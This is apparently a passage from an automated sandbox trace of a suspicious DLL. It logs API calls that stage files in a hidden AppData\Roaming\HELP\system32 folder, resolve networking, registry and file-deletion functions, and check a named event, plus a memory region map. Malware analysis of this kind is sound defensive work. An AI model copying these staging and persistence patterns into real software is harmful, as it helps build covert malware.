returned 0x0 [0035.963] GetLastError () returned 0x0 [0035.963] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.963] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0035.963] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.963] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.963] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.963] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.963] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0035.963] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0035.963] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0035.963] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0035.963] GetLastError () returned 0xb7 [0035.963] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.963] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0035.964] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0035.964] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0035.964] wsprintfA (in: param_1=0x16f678, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.964] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0035.964] wsprintfA (in: param_1=0x16f574, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.964] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.964] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0035.964] CloseHandle (hObject=0x74) returned 1 [0035.964] GetLastError () returned 0x0 [0035.964] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0035.964] GetLastError () returned 0x0 [0035.964] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0035.964] GetSystemDirectoryA (in: lpBuffer=0x16f678, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.964] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.964] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0035.964] CloseHandle (hObject=0x74) returned 1 [0035.964] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.965] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.965] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0035.966] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.966] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0035.966] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0035.966] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0035.966] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0035.966] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0035.966] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0035.966] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0035.966] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0035.966] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0035.967] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0035.968] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0035.968] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0035.968] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0035.968] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0035.968] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0035.968] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0035.968] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.968] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0035.968] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0035.968] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0035.968] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0035.968] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0035.968] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0035.968] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0035.968] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0035.968] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0035.968] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0035.968] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0035.968] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0035.968] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0035.968] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0035.969] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0035.969] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0035.969] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0035.969] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0035.969] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0035.969] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0035.969] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0035.969] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0035.969] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0035.969] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.969] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.969] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.969] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0035.971] HeapDestroy (hHeap=0x1160000) returned 1 Process: id = "64" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fac0" os_pid = "0xd8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry /fn_args=\"iexplore.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2793 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2794 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2795 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2796 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 2797 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2798 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2799 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2800 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2801 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 2802 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2803 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2804 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2805 start_va = 0x2e0000 end_va = 0x346fff entry_point = 0x2e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2806 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 2807 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2808 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2809 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2810 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2811 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2812 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2813 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2814 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2815 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2816 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2817 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2818 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2819 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 2820 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2821 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2822 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2823 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2824 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 2825 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2826 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2827 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2828 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2829 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2830 start_va = 0x1200000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2831 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2832 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2833 start_va = 0x13f0000 end_va = 0x161ffff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 2960 start_va = 0x12c0000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 2961 start_va = 0x13e0000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x00000000013e0000" filename = "" Region: id = 2962 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 134 os_tid = 0xd90 [0036.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f554 | out: lpSystemTimeAsFileTime=0x18f554*(dwLowDateTime=0xe3266df0, dwHighDateTime=0x1d3dfba)) [0036.012] GetCurrentProcessId () returned 0xd8c [0036.012] GetCurrentThreadId () returned 0xd90 [0036.012] GetTickCount () returned 0x181fb [0036.012] QueryPerformanceCounter (in: lpPerformanceCount=0x18f54c | out: lpPerformanceCount=0x18f54c*=376382086) returned 1 [0036.013] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.013] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0036.013] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0036.014] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0036.014] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0036.014] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.014] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.014] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.014] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.014] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.014] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.014] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.014] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.015] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.015] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.015] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.015] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.015] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.015] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.015] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.015] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.016] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.016] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.016] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.016] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.016] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.016] GetCurrentThreadId () returned 0xd90 [0036.016] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry /fn_args=\"iexplore.exe\"" [0036.016] GetEnvironmentStringsW () returned 0x1f7860* [0036.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0036.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13e09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0036.016] FreeEnvironmentStringsW (penv=0x1f7860) returned 1 [0036.017] GetStartupInfoA (in: lpStartupInfo=0x18f4a4 | out: lpStartupInfo=0x18f4a4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0036.017] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0036.017] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0036.017] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0036.017] SetHandleCount (uNumber=0x20) returned 0x20 [0036.017] GetLastError () returned 0x0 [0036.017] SetLastError (dwErrCode=0x0) [0036.017] GetLastError () returned 0x0 [0036.017] SetLastError (dwErrCode=0x0) [0036.017] GetLastError () returned 0x0 [0036.017] SetLastError (dwErrCode=0x0) [0036.017] GetACP () returned 0x4e4 [0036.017] GetLastError () returned 0x0 [0036.017] SetLastError (dwErrCode=0x0) [0036.017] IsValidCodePage (CodePage=0x4e4) returned 1 [0036.017] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f484 | out: lpCPInfo=0x18f484) returned 1 [0036.017] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ef50 | out: lpCPInfo=0x18ef50) returned 1 [0036.017] GetLastError () returned 0x0 [0036.017] SetLastError (dwErrCode=0x0) [0036.017] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18eee0 | out: lpCharType=0x18eee0) returned 1 [0036.017] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f364, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.017] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f364, cbMultiByte=256, lpWideCharStr=0x18ecc8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.017] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ef64 | out: lpCharType=0x18ef64) returned 1 [0036.017] GetLastError () returned 0x0 [0036.017] SetLastError (dwErrCode=0x0) 